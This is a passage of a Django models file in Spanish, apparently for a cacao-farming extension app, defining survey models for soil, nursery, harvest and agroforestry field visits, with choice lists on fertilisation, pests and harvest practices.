opcion = models.IntegerField(choices=(
(1,'Ultisol (rojo)'),
(2, 'Andisol (volcánico)'),
(3, 'Vertisol'),))
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Tipo de suelo"
class Meta:
verbose_name = 'Tipo de suelo'
verbose_name_plural = 'Tipo de suelo'
class Punto8SueloPropuesta(models.Model):
tipo = models.ForeignKey(TipoFertilizantes)
cantidad = models.FloatField('Cantidad(Valor)')
unidad = models.IntegerField(choices=CHOICE_UNIDAD_MEDIDA_ABONO)
frecuencia = models.FloatField('Frecuencia (por año)')
meses = MultiSelectField(choices=CHOICES_FECHA_PODA, verbose_name='Meses de aplicación')
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Nueva Propuesta de Fertilización Generada"
class Meta:
verbose_name = 'Nueva Propuesta de Fertilización Generada'
verbose_name_plural = 'Nueva Propuesta de Fertilización Generada'
CHOICE_PUNTO9_LIMITACION_1 = (
(1, 'Erosión de Suelo'),
)
CHOICE_PUNTO9_LIMITACION_1_ACCION = (
('A', 'Barrera viva'),
('B', 'Cobertura de suelo'),
('C', 'Barrera Muerta'),
('D', 'Siembra en Curvas a Nivel'),
('E', 'Terrazas'),
)
CHOICE_PUNTO9_LIMITACION_2 = (
    (1, 'Mal drenaje y encharcamientos'),
)
CHOICE_PUNTO9_LIMITACION_2_ACCION = (
('A', 'Acequias'),
('B', 'Canales de drenaje de larga'),
('C', 'Canales de drenaje alrededor de la parcela'),
)
CHOICE_PUNTO9_LIMITACION_3 = (
(1, 'Deficiencia de Nutrientes'),
)
CHOICE_PUNTO9_LIMITACION_3_ACCION = (
('A', 'Aplicar abonos orgánicos'),
('B', 'Aplicar abonos minerales'),
)
CHOICE_PUNTO9_LIMITACION_4 = (
(1, 'Exceso de nutrientes'),
)
CHOICE_PUNTO9_LIMITACION_4_ACCION = (
('A', 'Bajar nivel de fertilización'),
)
CHOICE_PUNTO9_LIMITACION_5 = (
(1, 'Desbalance de nutrientes'),
)
CHOICE_PUNTO9_LIMITACION_5_ACCION = (
('A', 'Ajustar programa de fertilización '),
)
CHOICE_PUNTO9_LIMITACION_6 = (
(1, 'Enfermedades y plagas de raíces'),
)
CHOICE_PUNTO9_LIMITACION_6_ACCION = (
('A', 'Abonos orgánicos'),
('B', 'Obras de drenaje'),
('C', 'Aplicación de ceniza'),
)
CHOICE_PUNTO9_DONDE = (
(1, 'En todo parcela'),
(2, 'En algunas partes'),
)
class Punto9Erosion(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_1)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_1_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de eroción"
class Meta:
verbose_name = 'Erosión de Suelo'
verbose_name_plural = 'Erosión de Suelo'
class Punto9Drenaje(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_2)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_2_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de mal drenaje"
class Meta:
        verbose_name = 'Mal drenaje y encharcamientos'
        verbose_name_plural = 'Mal drenaje y encharcamientos'
class Punto9Nutrientes(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_3)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_3_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de deficiencia nutrientes"
class Meta:
verbose_name = 'Deficiencia de Nutrientes'
verbose_name_plural = 'Deficiencia de Nutrientes'
class Punto9Exceso(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_4)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_4_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de exceso de nutrientes"
class Meta:
verbose_name = 'Exceso de nutrientes'
verbose_name_plural = 'Exceso de nutrientes'
class Punto9Desbalance(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_5)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_5_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de desbalance de nutrientes"
class Meta:
verbose_name = 'Desbalance de nutrientes'
verbose_name_plural = 'Desbalance de nutrientes'
class Punto9Enfermedades(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_6)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_6_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de enfermedades y plagas"
class Meta:
verbose_name = 'Enfermedades y plagas de raíces'
verbose_name_plural = 'Enfermedades y plagas de raíces'
#------------ fin ficha suelo ---------------------------------
#-------------------- comienza ficha viviero ------------------
class FichaVivero(models.Model):
productor = models.ForeignKey(Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_vivero')
tecnico = models.ForeignKey(Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_vivero')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha vivero"
verbose_name_plural = "Ficha vivero"
CHOICE_VIVERO_CONVERSACION_1 = (
('A', 'Enero'),
('B', 'Febrero'),
('C', 'Marzo'),
('D', 'Abril'),
('E', 'Mayo'),
('F', 'Junio'),
('G', 'Julio'),
('H', 'Agosto'),
('I', 'Septiembre'),
('J', 'Octubre'),
('K', 'Noviembre'),
('L', 'Diciembre'),
)
CHOICE_VIVERO_CONVERSACION_2 = (
('A', 'En este momento hay buena semilla'),
('B', 'En este momento hay suficiente agua'),
('C', 'En este momento hay menos plagas'),
('D', 'Nos permite para tener plantas listas para sembrar en el invierno'),
)
CHOICE_VIVERO_CONVERSACION_3 = (
('A', 'Buena altura'),
('B', 'Tallo fuerte'),
('C', 'Buena formación horqueta'),
('D', 'Ramas principales robustas'),
('E', 'Buena producción de frutos (más de 40 frutos por planta)'),
('F', 'Alta tolerancia a plagas y enfermedades'),
('G', 'Más de 40 almendras dentro de la mazorca'),
)
CHOICE_VIVERO_CONVERSACION_4 = (
('A', 'Corte de mazorca madura'),
('B', 'Extracción de almendras'),
('C', 'Selección de almendras de mayor tamaño'),
    ('D', 'Remoción de mucílago o baba'),
('E', 'Empaque en bolsas plásticas con aserrín semi-húmedo'),
('F', 'Toma en cuenta fases de la luna'),
)
CHOICE_VIVERO_CONVERSACION_5 = (
('A', 'Soleando la tierra'),
('B', 'Aplicando agua caliente'),
('C', 'Aplicando cal o ceniza'),
('D', 'Aplicando venenos'),
('E', 'No desinfecta'),
)
CHOICE_VIVERO_CONVERSACION_6 = (
(1, 'Sola tierra'),
(2, 'Tierra + Arena'),
(3, 'Tierra + Abono orgánico (compost)'),
(4, 'Tierra + abono orgánico + Cal o ceniza'),
(5, 'Tierra + Arena + Cal o Ceniza + Abono orgánico'),
)
CHOICE_VIVERO_CONVERSACION_7 = (
(1, 'Bolsa de 6 X 8 pulgadas '),
(2, 'Bolsa de 8 X 10 pulgadas'),
(3, 'Bolsa de 10 X 12 pulgadas'),
)
CHOICE_VIVERO_CONVERSACION_8 = (
(1, 'Acostado u horizontal'),
(2, 'Parado o Vertical'),
(3, 'De cualquier manera'),
)
CHOICE_VIVERO_CONVERSACION_9 = (
('A', 'Cerca de fuentes de agua'),
('B', 'Cercado protegido de animales'),
('C', 'Terreno plano'),
('D', 'Con buena orientación de los bancos (Este-Oeste)'),
('E', 'Con sombra natural'),
('F', 'Con ramada'),
)
CHOICE_VIVERO_CONVERSACION_10 = (
(1, 'Injerto de yema'),
(2, 'Injerto de cogollo'),
(3, 'Ninguno'),
)
CHOICE_VIVERO_CONVERSACION_12 = (
(1, 'De la misma finca'),
(2, 'De finca vecina'),
(3, 'De Jardín Clonal'),
)
class VivieroConversacion(models.Model):
conversacion1 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_1,
verbose_name='1.¿En qué meses del año planifica o construye viveros para producción de plantas de cacao?')
conversacion2 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_2,
verbose_name='2.¿Por qué hace vivero en estos meses?')
conversacion3 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_3,
verbose_name='3.¿Cuáles son características más deseables para una planta productiva?')
conversacion4 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_4,
verbose_name='4.¿Qué pasos realiza para la preparación de semillas de cacao?')
conversacion5 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_5,
verbose_name='5.¿Con qué desinfecta el suelo para el vivero?')
conversacion6 = models.IntegerField(choices=CHOICE_VIVERO_CONVERSACION_6,
verbose_name='¿Cómo prepara el sustrato para la producción de plantas de cacao en vivero?')
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Conversación con el Productor o productora"
# class Meta:
# verbose_name = 'I.Conversación con el Productor o productora'
# verbose_name_plural = 'I.Conversación con el Productor o productora'
CHOICE_VIVERO_NUEVO_CONVERSACION2 = ((1,'Misma finca'),(2,'Del jardin clonal'),(3, 'Otras fuentes'))
class ViveroConversacion2(models.Model):
conversacion7 = models.IntegerField(choices=CHOICE_VIVERO_CONVERSACION_7,
verbose_name='¿Qué tamaño de bolsa de polietileno utiliza para la producción de plantas en vivero?')
conversacion8 = models.IntegerField(choices=CHOICE_VIVERO_CONVERSACION_8,
verbose_name='¿Cómo coloca la semilla en el sustrato en la bolsa de polietileno?')
conversacion9 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_9,
verbose_name='¿Cómo es el sitio del vivero?')
conversacion10 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_10,
verbose_name=' ¿Qué tipo de injerto ha realizado?')
conversacion11 = models.FloatField('¿Cuál ha sido el porcentaje de prendimiento?', null=True)
conversacion12 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_12,
verbose_name='¿De dónde obtiene las varetas para realizar los injertos?')
    conversacion13 = models.FloatField('¿Cuántos meses se mantiene la planta en el vivero?', null=True, blank=True)
conversacion14 = models.IntegerField(choices=CHOICE_VIVERO_NUEVO_CONVERSACION2,
        verbose_name='¿De dónde obtiene las semillas?', null=True, blank=True)
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Conversación con el Productor o productora 2"
#observaciones
CHOICER_VIVIERO_FUENTE_SEMILLA = ((1,'De la misma finca'),(2,'De finca vecina'),(3,'De Jardín Clonal'))
class VivieroObservacion1(models.Model):
observacion1 = models.FloatField('Cantidad de las plantas')
observacion2 = models.FloatField('Edad de las plantas en meses')
observacion3 = models.IntegerField(choices=CHOICER_VIVIERO_FUENTE_SEMILLA,
verbose_name='Fuente de semilla')
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Observación del vivero 1"
    class Meta:
        verbose_name = 'Observación del vivero 1'
        verbose_name_plural = 'Observación del vivero 1'
CHOICE_VIVERO_PLAGAS_ENFERMEDADES = (
(1, 'Zompopo'),
(2, 'Barrenador'),
(3, 'Minador'),
(4, 'Tizón'),
(5, 'Antracnosis'),
(6, 'Mal de talluelo'),
(7, 'Áfidos'),
(8, 'Gusanos'),
(9, 'Deficiencia nutricional'),
)
CHOICE_VIVERO_SI_NO = (
(1, 'Si'),
(2, 'No'),
)
class VivieroObservacion2(models.Model):
observacion3 = models.IntegerField(choices=CHOICE_VIVERO_PLAGAS_ENFERMEDADES,
verbose_name='Plaga o enfermedad')
planta_1 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_2 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_3 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_4 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_5 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_6 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_7 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_8 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_9 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
planta_10 = models.IntegerField(choices=CHOICE_VIVERO_SI_NO)
ficha = models.ForeignKey(FichaVivero)
total_si = models.IntegerField(editable=False, null=True, blank=True)
def __unicode__(self):
return u"Observación del vivero 2"
    def save(self, *args, **kwargs):
        # Count at how many of the ten plants the pest was observed (1 = 'Si')
        plantas = [self.planta_1, self.planta_2, self.planta_3, self.planta_4,
                   self.planta_5, self.planta_6, self.planta_7, self.planta_8,
                   self.planta_9, self.planta_10]
        self.total_si = sum(1 for planta in plantas if planta == 1)
        super(VivieroObservacion2, self).save(*args, **kwargs)
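    # Since each row covers exactly ten plants, total_si can also be read as an
    # incidence of total_si * 10 percent for that pest (an interpretation only;
    # nothing in this module enforces it).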
# class Meta:
# verbose_name = 'Presencia de plagas y enfermedades'
# verbose_name_plural = 'Presencia de plagas y enfermedades'
class ProductosVivero(models.Model):
nombre = models.CharField(max_length=250)
def __unicode__(self):
return self.nombre
# class Meta:
# verbose_name = 'Productos para el vivero'
# verbose_name_plural = 'Productos para el vivero'
CHOICE_VIVERO_UNIDAD_PRODUCTOS = ((1,'Onz/planta'),(2,'Lt/bombada'),(3,'onz/bomba'),)
class VivieroObservacionProductos(models.Model):
producto = models.ForeignKey(ProductosVivero, verbose_name='Nombre')
cantidad = models.FloatField()
unidad = models.IntegerField(choices=CHOICE_VIVERO_UNIDAD_PRODUCTOS)
frecuencia = models.FloatField()
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Observación del vivero 3"
CHOICE_VIVERO_ANALISIS_1 = (
('A', 'Ningún problema'),
('B', 'Proveniente de plantas con baja productividad'),
('C', 'Posiblemente con alta incompatibilidad'),
)
CHOICE_VIVERO_ANALISIS_2 = (
('A', 'Ningún problema'),
('B', 'Planta desuniforme'),
('C', 'Plantas con poco vigor'),
('D', 'Plantas con deficiencia nutricionales'),
('E', 'Mal manejo de riego'),
('F', 'Mal manejo de sombra'),
)
CHOICE_VIVERO_ANALISIS_3 = (
('A', 'Zompopo'),
('B', 'Barrenador'),
('C', 'Minador'),
('D', 'Tizón'),
('E', 'Antracnosis'),
('F', 'Mal de talluelo'),
('G', 'Áfidos'),
('H', 'Gusanos'),
)
CHOICE_VIVERO_ANALISIS_4 = (
('A', 'Mejorar la fuente de semilla'),
('B', 'Mezclar las 9 fuentes de semilla'),
('C', 'Mejorar el sustrato en las bolsas'),
('D', 'Mejorar el manejo de plagas'),
('E', 'Mejorar el manejo de nutrición'),
('F', 'Mejorar el riego y sombra'),
)
class VivieroAnalisisSituacion(models.Model):
analisis1 = MultiSelectField(choices=CHOICE_VIVERO_ANALISIS_1,
verbose_name='¿Cuáles son los problemas de la semilla?')
analisis2 = MultiSelectField(choices=CHOICE_VIVERO_ANALISIS_2,
        verbose_name='¿Cuáles son los problemas de las plantas?')
analisis3 = MultiSelectField(choices=CHOICE_VIVERO_ANALISIS_3,
verbose_name='¿Cuáles son los problemas de plagas y enfermedades?')
analisis4 = MultiSelectField(choices=CHOICE_VIVERO_ANALISIS_4,
verbose_name='¿Qué acciones vamos a realizar para mejorar el vivero?')
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Análisis de la situación y acciones en el vivero"
#-------- fin de ficha vivero -----------------------
#--------- inicia ficha cosecha ----------------------
class FichaCosecha(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_cosecha')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_cosecha')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha cosecha"
verbose_name_plural = "Ficha cosecha"
CHOICE_COSECHA_CONVERSACION_1 = (
('A', 'Por el color'),
('B', 'Por el tamaño'),
('C', 'Por la textura'),
('D', 'Por la fecha'),
)
CHOICE_COSECHA_CONVERSACION_2 = (
('A', 'Media Luna'),
('B', 'Cutacha'),
('C', 'Machete'),
('D', 'Tijera'),
)
CHOICE_COSECHA_CONVERSACION_3 = (
('A', 'Rechazar mazorcas enfermas'),
('B', 'Rechazar mazorcas dañadas'),
('C', 'Rechazar mazorcas sobremaduras'),
('D', 'Rechazar mazorcas inmaduras'),
('E', 'Rechazar mazorcas pequeñas'),
('F', 'Seleccionar mazorcas maduras'),
('G', 'Seleccionar mazorcas de buena calidad'),
)
CHOICE_COSECHA_CONVERSACION_4 = (
('A', 'Media Luna'),
('B', 'Cutacha'),
('C', 'Machete'),
('D', 'Maso'),
)
class CosechaConversacion1(models.Model):
conversacion1 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_1,
verbose_name='1.1-¿Cómo se determina qué la mazorca está madura para cosecha? ')
conversacion2 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_2,
verbose_name='1.2-¿Qué herramientas utiliza para el corte de las mazorcas maduras? ')
conversacion3 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_3,
verbose_name='1.3-¿Qué criterios toma en cuenta para la selección de mazorcas antes del quiebre? ')
conversacion4 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_4,
verbose_name='1.4-¿Qué herramientas utiliza para el quiebre de las mazorcas seleccionadas? ')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"Conversación con la productora o el productor 1"
CHOICE_COSECHA_CONVERSACION_5 = (
('A', 'Bolsa plástica'),
('B', 'Bidón o Balde'),
('C', 'Saco Macen'),
('D', 'Saco de yute'),
('E', 'Cajón de madera'),
)
CHOICE_COSECHA_CONVERSACION_7 = (
('A', 'Entierra las mazorcas'),
('B', 'Botan las mazorcas sin enterrar'),
('C', 'Queman las mazorcas'),
)
CHOICE_COSECHA_CONVERSACION_8 = (
(1, 'Cada mes'),
(2, 'Cada quince días'),
(3, 'Depende de la maduración'),
)
class CosechaConversacion2(models.Model):
conversacion5 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_5,
verbose_name='1.5-¿Qué tipo de almacenamiento emplea después del quiebre de las mazorcas de cacao? ')
conversacion6 = models.FloatField('1.6-¿Cuánto tiempo tarda en llevar el cacao en baba al centro de acopio?')
conversacion7 = MultiSelectField(choices=CHOICE_COSECHA_CONVERSACION_7,
verbose_name='1.7-¿Qué manejo realiza con las mazorcas de cacao enfermas? ')
conversacion8 = models.IntegerField(choices=CHOICE_COSECHA_CONVERSACION_8,
verbose_name='1.8-¿Cada cuánto realizan los cortes? ')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"Conversación con la productora o el productor 2"
CHOICE_COSECHA_9_MESES = (
(1, 'Enero'),
(2, 'Febrero'),
(3, 'Marzo'),
(4, 'Abril'),
(5, 'Mayo'),
(6, 'Junio'),
(7, 'Julio'),
(8, 'Agosto'),
(9, 'Septiembre'),
(10, 'Octubre'),
(11, 'Noviembre'),
(12, 'Diciembre'),
)
CHOICE_COSECHA_9_FLORACION = (
(1, 'No hay flores'),
    (2, 'Pocas flores'),
(3, 'Algo de flores'),
    (4, 'Muchas flores'),
)
class CosechaMesesFloracion(models.Model):
mes = models.IntegerField(choices=CHOICE_COSECHA_9_MESES,
verbose_name='Meses')
floracion = models.IntegerField(choices=CHOICE_COSECHA_9_FLORACION,
verbose_name='Floración')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"¿Cuáles son las meses de mayor floración? "
CHOICE_COSECHA_10_COSECHA = (
(1, 'No hay Cosecha'),
(2, 'Poca cosecha'),
(3, 'Algo de cosecha'),
(4, 'Mucha cosecha'),
)
class CosechaMesesCosecha(models.Model):
mes = models.IntegerField(choices=CHOICE_COSECHA_9_MESES,
verbose_name='Meses')
floracion = models.IntegerField(choices=CHOICE_COSECHA_10_COSECHA,
verbose_name='Cosecha')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"¿Cuáles son las meses de mayor floración? "
CHOICE_COSECHA_ESTIMADO_PUNTOS = (
(1, 'Número de mazorcas sanas'),
(2, 'Número de mazorcas enfermas'),
(3, 'Número de mazorcas dañadas'),
)
class CosechaPunto1(models.Model):
mazorcas = models.IntegerField(choices=CHOICE_COSECHA_ESTIMADO_PUNTOS,
verbose_name='Mazorcas')
planta_1 = models.FloatField()
planta_2 = models.FloatField()
planta_3 = models.FloatField()
planta_4 = models.FloatField()
planta_5 = models.FloatField()
planta_6 = models.FloatField()
planta_7 = models.FloatField()
planta_8 = models.FloatField()
planta_9 = models.FloatField()
planta_10 = models.FloatField()
total_platas = models.FloatField(editable=False, null=True, blank=True)
contador = models.IntegerField(editable=False, default=0, null=True, blank=True)
ficha = models.ForeignKey(FichaCosecha)
    def save(self, *args, **kwargs):
        plantas = [self.planta_1, self.planta_2, self.planta_3, self.planta_4,
                   self.planta_5, self.planta_6, self.planta_7, self.planta_8,
                   self.planta_9, self.planta_10]
        self.total_platas = sum(plantas)
        # Count plants with a valid (non-negative) record
        self.contador = sum(1 for planta in plantas if planta >= 0)
        super(CosechaPunto1, self).save(*args, **kwargs)
def __unicode__(self):
return u"2.1 Punto 1"
class CosechaPunto2(models.Model):
mazorcas = models.IntegerField(choices=CHOICE_COSECHA_ESTIMADO_PUNTOS,
verbose_name='Mazorcas')
planta_1 = models.FloatField()
planta_2 = models.FloatField()
planta_3 = models.FloatField()
planta_4 = models.FloatField()
planta_5 = models.FloatField()
planta_6 = models.FloatField()
planta_7 = models.FloatField()
planta_8 = models.FloatField()
planta_9 = models.FloatField()
planta_10 = models.FloatField()
total_platas = models.FloatField(editable=False, null=True, blank=True)
contador = models.IntegerField(editable=False, default=0, null=True, blank=True)
ficha = models.ForeignKey(FichaCosecha)
    def save(self, *args, **kwargs):
        plantas = [self.planta_1, self.planta_2, self.planta_3, self.planta_4,
                   self.planta_5, self.planta_6, self.planta_7, self.planta_8,
                   self.planta_9, self.planta_10]
        self.total_platas = sum(plantas)
        # Count plants with a valid (non-negative) record
        self.contador = sum(1 for planta in plantas if planta >= 0)
        super(CosechaPunto2, self).save(*args, **kwargs)
def __unicode__(self):
return u"2.2 Punto 2"
class CosechaPunto3(models.Model):
mazorcas = models.IntegerField(choices=CHOICE_COSECHA_ESTIMADO_PUNTOS,
verbose_name='Mazorcas')
planta_1 = models.FloatField()
planta_2 = models.FloatField()
planta_3 = models.FloatField()
planta_4 = models.FloatField()
planta_5 = models.FloatField()
planta_6 = models.FloatField()
planta_7 = models.FloatField()
planta_8 = models.FloatField()
planta_9 = models.FloatField()
planta_10 = models.FloatField()
total_platas = models.FloatField(editable=False, null=True, blank=True)
contador = models.IntegerField(editable=False, default=0, null=True, blank=True)
ficha = models.ForeignKey(FichaCosecha)
    def save(self, *args, **kwargs):
        plantas = [self.planta_1, self.planta_2, self.planta_3, self.planta_4,
                   self.planta_5, self.planta_6, self.planta_7, self.planta_8,
                   self.planta_9, self.planta_10]
        self.total_platas = sum(plantas)
        # count the plants that have a recorded value (>= 0)
        self.contador = sum(1 for planta in plantas if planta >= 0)
        super(CosechaPunto3, self).save(*args, **kwargs)
def __unicode__(self):
return u"2.3 Punto 3"
class CosechaAreaPlantas(models.Model):
area = models.FloatField('Área de la parcela (en mz)')
plantas = models.FloatField('Número de plantas por mz')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"Area y número de platas"
CHOICE_COSECHA_ANALISIS_1 = (
('A', 'Pocas plantas productivas'),
('B', 'Muchas mazorcas enfermas'),
('C', 'Muchas mazorcas dañadas'),
('D', 'Muchas mazorcas pequeñas'),
('E', 'Muchas mazorcas con pocos granos'),
('F', 'Muchos granos pequeños'),
)
CHOICE_COSECHA_ANALISIS_2 = (
('A', 'Mazorcas enfermas'),
('B', 'Mazorcas dañadas'),
('C', 'Mazorcas pequeñas'),
)
CHOICE_COSECHA_ANALISIS_3 = (
('A', 'Remover las mazorcas enfermas a tiempo'),
('B', 'Establecer control de las ardillas'),
('C', 'Mejorar la nutrición de las plantas'),
('D', 'Realizar poda de las plantas de cacao'),
('E', 'Regular la sombra'),
('F', 'Cosechar a tiempo'),
('G', 'Reponer las plantas no productivas con plantas productivas'),
)
class CosechaAnalisis(models.Model):
analisis1 = MultiSelectField(choices=CHOICE_COSECHA_ANALISIS_1,
verbose_name='3.1-¿Cuál es el problema principal que afecta el rendimiento productivo de la parcela de cacao?')
analisis2 = MultiSelectField(choices=CHOICE_COSECHA_ANALISIS_2,
verbose_name='3.2-¿Cuál es la causa de la pérdida de producción en la parcela de cacao? ')
analisis3 = MultiSelectField(choices=CHOICE_COSECHA_ANALISIS_3,
verbose_name='3.3-¿Qué prácticas se pueden realizar en la parcela de cacao para mejorar la cosecha? ')
ficha = models.ForeignKey(FichaCosecha)
def __unicode__(self):
return u"Análisis sobre la cosecha y acciones"
# ---------------- end of cosecha (harvest) form ----------------------
# ---------------- start of saf (agroforestry system) form ------------
class FichaSaf(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_saf')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_saf')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha saf"
verbose_name_plural = "Ficha saf"
CHOICE_SAF_1_1 = (
('A', 'Producción convencional con uso intensivo de químicos'),
('B', 'Producción orgánica con insumos naturales'),
('C', 'Producción agroecológica y diversificada'),
('D', 'Producción especializada según el tipo de mercado'),
)
CHOICE_SAF_1_2 = (
('A', 'Producción de cacao'),
('B', 'Producción de frutas'),
('C', 'Producción de madera'),
('D', 'Conservación de suelo y agua'),
('E', 'Aumento de ingresos'),
('F', 'Generar empleo'),
('G', 'Diversidad natural'),
('H', 'Otros beneficios'),
)
class SafConversacion1(models.Model):
conversacion1 = MultiSelectField(choices=CHOICE_SAF_1_1,
verbose_name='1.1¿Cuál fue su objetivo de establecer el cultivo de cacao en sistema agroforestales?')
conversacion2 = MultiSelectField(choices=CHOICE_SAF_1_2,
verbose_name='1.2¿Qué beneficios esperaban del sistema agroforestal en su parcela de cacao?')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Conversación 1"
CHOICE_SAF_1_3 = (
(1, 'Nada de lluvia'),
(2, 'Poca lluvia'),
(3, 'Algo de lluvia'),
(4, 'Mucha lluvia'),
)
class SafConversacion2(models.Model):
conversacion3 = models.IntegerField(choices=CHOICE_COSECHA_9_MESES,
verbose_name='Meses')
conversacion4 = models.IntegerField(choices=CHOICE_SAF_1_3,
verbose_name='Opciones')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.3¿Cuáles son meses más lluviosos en su finca?"
CHOICE_SAF_1_4 = (
(1, 'Nada de viento'),
(2, 'Poco viento'),
(3, 'Algo de viento'),
(4, 'Mucho viento'),
)
class SafConversacion3(models.Model):
conversacion3 = models.IntegerField(choices=CHOICE_COSECHA_9_MESES,
verbose_name='Meses')
conversacion4 = models.IntegerField(choices=CHOICE_SAF_1_4,
verbose_name='Opciones')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.4¿Cuáles son meses más ventosos en su finca?"
CHOICE_SAF_1_5 = (
(1, 'Establecer el vivero'),
(2, 'Limpieza de terreno'),
(3, 'Siembra de cacao'),
(4, 'Establecer la sombra'),
(5, 'Poda de cacao'),
(6, 'Manejo de sombra'),
(7, 'Deshierba'),
(8, 'Abonar'),
(9, 'Foliar'),
(10, 'Deschuponar'),
(11, 'Cortar mazorcas enfermas'),
(12, 'Cosecha y Quiebre'),
)
class SafConversacion4(models.Model):
conversacion5 = models.IntegerField(choices=CHOICE_SAF_1_5,
verbose_name='Opcion')
conversacion6 = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='Opciones')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.5¿Cómo toma en cuenta lluvia y viento para decidir los momentos de las labores de sistema agroforestal?"
CHOICE_SAF_1_5_TOPOGRAFIA = (
(1, 'Terreno plano'),
(2, 'Terreno con poco pendiente'),
(3, 'Terreno con mucho pendiente'),
)
CHOICE_SAF_1_5_FERTILIDAD = (
(1, 'Suelo fértil'),
(2, 'Suelo poco fértil'),
(3, 'Suelo degradado y compacto'),
)
class SafConversacion5(models.Model):
conversacion7 = models.IntegerField(choices=CHOICE_SAF_1_5_TOPOGRAFIA,
verbose_name='Topografía')
conversacion8 = models.IntegerField(choices=CHOICE_SAF_1_5_FERTILIDAD,
verbose_name='Fertilidad')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"1.5¿Cómo son las características del suelo y su fertilidad?"
CHOICE_SAF_1_6_MADERABLE = (
('A', 'Que tenga buena altura'),
('B', 'Que no tenga hojas en el verano'),
('C', 'Que tenga hojas en el verano '),
('D', 'Que tenga crecimiento rápido '),
    ('E', 'Que tenga una sombra no muy densa '),
('F', 'Que tenga valor comercial '),
